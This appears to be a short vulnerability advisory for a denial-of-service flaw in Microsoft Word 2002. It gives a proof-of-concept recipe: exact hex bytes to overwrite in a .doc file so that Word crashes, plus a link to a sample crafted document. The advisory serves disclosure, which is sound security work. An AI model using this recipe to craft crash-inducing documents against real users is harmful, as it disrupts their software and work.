|
Microsoft Word Malformed Document Denial of Service Vulnerability
A proof-of-concept example has been provided. The following steps can be performed in order to create a proof of concept Word document: 1. Open Word. 2. Save .doc file. 3. Modify .doc file by using binary editor as follows: these lines were taken from .doc file of Microsoft Word 2002(10.2627.3311): 00 00 00 00 00 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 00 00 00 00 b4 01 00 00 20 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 ------- 4. Change them as follows: 00 00 00 00 00 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 62 62 62 62 b4 01 00 00 20 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 ------- 5. Open modified .doc file. 6. Microsoft Word will crashes. An example document has also been provided at the following location: http://www12.brinkster.com/bsecurity/Doc1.doc |
|
|
Privacy Statement |